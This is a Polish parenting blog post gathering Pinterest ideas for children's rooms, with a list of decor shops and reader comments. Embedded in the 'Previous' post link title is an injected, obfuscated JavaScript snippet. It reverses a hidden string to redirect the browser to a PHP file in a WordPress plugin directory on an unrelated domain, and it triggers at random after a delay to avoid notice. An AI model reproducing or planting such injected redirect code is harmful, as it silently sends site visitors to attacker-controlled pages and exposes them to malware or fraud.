Garść inspiracji: Pokój dziecka.


Kto zagląda na Pinterest’a, ten wie, że to niewyczerpana kopalnia inspiracji. Wnętrza, moda, porady, kuchnia, tatuaże, miejsca … znaleźć można tam wszystko. Również piękne zdjęcia i ciekawe teksty. Z obserwacji wiem, że zaznaczając  Stany Zjednoczone jako kraj pochodzenia, można dotrzeć do szalenie kreatywnych ludzi i znacznie ciekawszych pinów. Poniżej zebrałam pomysły na urządzenie pokoju dziecięcego, które szczególnie mnie urzekły. Myślę, że każda z propozycji ma coś w sobie, choćby to był najmniejszy szczegół. Zobaczcie, jak fajowo mogą mieszkać maluchy.

 

 

(zdjęcia: pinterest.com)

Coś wpadło Wam w oko? Jeśli tak, to poniżej lista sklepów/manufaktur, gdzie możecie nabyć dekoracje w podobnym klimacie. Znacie jeszcze inne, fantastyczne miejsca na zakupy? Dajcie znać w komentarzach.

IKEA (oczywiście ;))

Scandikids

Scandiloft

Scandishop

Betty’s Home

Cottonove Love (+ Sznurkowe Love)

Pomponove

Alma Hand Made

Bambooko

Cocoshki

Hopii

Previous "Przyszła do mnie i w końcu powiedziała <script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to na głos: Mamo, chcę być chłopcem."
Next O czym przypomiało mi drugie dziecko.

Suggested Posts

Na śniadanie.

On the road again!

Lóżko dla starszaka, czyli KURA po naszemu.

Nasze wielkie mazurskie wakacje pod żaglami.

Konferencja w wakacyjnym klimacie, czyli #karmieswobodnie!

Trzeci miesiąc Niny.

3 komentarze

 1. Mama Jagody
  19 października 2014
  Odpowiedz

  polecam jeszcze Little Room 🙂

 2. 25 kwietnia 2015
  Odpowiedz

  Mój styl, dobrze bym się czuła w Twoim domu 🙂 Może dlatego mi się śniłaś (?). 🙂

Leave a reply

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *